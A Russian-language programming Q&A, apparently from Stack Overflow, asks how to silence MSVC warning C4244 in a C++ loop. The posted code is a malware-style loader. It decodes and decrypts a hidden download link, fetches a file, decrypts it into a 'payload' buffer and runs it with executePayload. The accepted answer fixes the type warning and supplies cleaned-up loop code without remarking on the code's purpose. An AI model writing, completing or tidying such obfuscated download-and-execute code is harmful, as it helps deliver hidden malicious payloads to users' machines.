# warning C4244: аргумент: преобразование "__int64" в "const unsigned int", возможна потеря данных

Tags: c++, visual-studio, visual-studio-2017, c++17

При сборке своей программы на С++ в Visual Studio вижу предупреждение:

```
warning C4244: аргумент: преобразование "__int64" в "const unsigned int", возможна потеря данных
```

Работе программы это никак не мешает, но хотелось бы исправить это предупреждение... Не могу понять в чём проблема, вроде всё ок... Вот проблемный кусок кода(в проблемной строке оставил комментарий):

```
...
int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR    lpCmdLine, _In_ int       nCmdShow) {
    string gdrive = "21gFn8NE7FlbExASajVtYaV83ZirUTnw5cwbDVmW66eCbOMO70YFUmuqGUb29+fRSSO+0U+UQwdMK1UzHUR7mEmIwZB1ArDy20wuEKj94g==";
    string key = "syxx77B+w3Y/fHNhRFICDsIQuLbIPlTfkK8kaCHmhNX2UYdhmChpPQrOPy+SytY=";
    vector<unsigned char> gdriveData = base64_decode(gdrive);
    vector<unsigned char> keyData = base64_decode(key);
    encrypter(&gdriveData, &keyData);
    string link = string(gdriveData.begin(), gdriveData.end());
    vector<unsigned char> file;
    for (int i = 0; i < 10; i++) {
        if (!downloadFile(link, &file)) {
            if (i == 9) {
                return 0;
            }
        }
        else {
            break;
        }
    }

    encrypter(&file, &keyData);
    unsigned char* payload = new unsigned char[file.size()];
    for (long long i = 0; i < file.size(); i++) {
        payload[i] = file.at(i); // если верить компилятору, проблема тут
    }
    executePayload(payload);

    return 0;
}
```

Answer (score 3, accepted):

Вы, по-видимому, компилируетесь в 32-битном режиме, где `vector<>::size_type` оказался `unsigned int`. А у вас индекс `i` имеет тип `long long`, за которым скрывается `__int64`. Вот о преобразовании из `i` в индекс-параметр `at` вас и предупреждает компилятор.

Зачем вы используете `long long` для `i`? Сделайте

```
for (vector<unsigned char>::size_type i = 0; i < file.size(); i++) {
```

или

```
for (size_t i = 0; i < file.size(); i++) {
```

или, если уж вам чем-то приглянулся именно `long long`

```
for (long long i = 0; i < file.size(); i++)
    payload[i] = file.at((vector<unsigned char>::size_type) i);
```

Comment: спасибо, установка типа vector<unsigned char>::size_type решила проблему :) А использовал long long потому что прочитал где-то что vector<unsigned char>::size_type == long long